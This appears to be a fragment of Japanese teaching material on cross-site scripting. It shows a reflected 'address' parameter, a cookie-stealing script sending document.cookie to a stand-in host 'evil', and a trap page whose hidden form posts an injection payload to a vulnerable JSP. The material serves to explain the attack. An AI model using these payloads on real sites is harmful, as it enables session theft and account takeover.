<script>document.location="http://evil/bad?"+document.cookie;</script>
page?address=東京都港区…
あなたの住所 東京都港区…
page?address=<script>…</script>
あなたの住所 <script>…</script>
<html><head> <script>function do_it(){document.f.submit();}</script> </head> <body><b>罠のページ</b><br> … <form name="f" method="post" action="http://victim/vulnerable.jsp"> <input type="hidden" name="input_item" value='"><script> document.location="http://evil/bad.php?c="+document.cookie </script>'> … </form> <a href="javascript:do_it();">クリックしたくなるリンク</a> </body></html>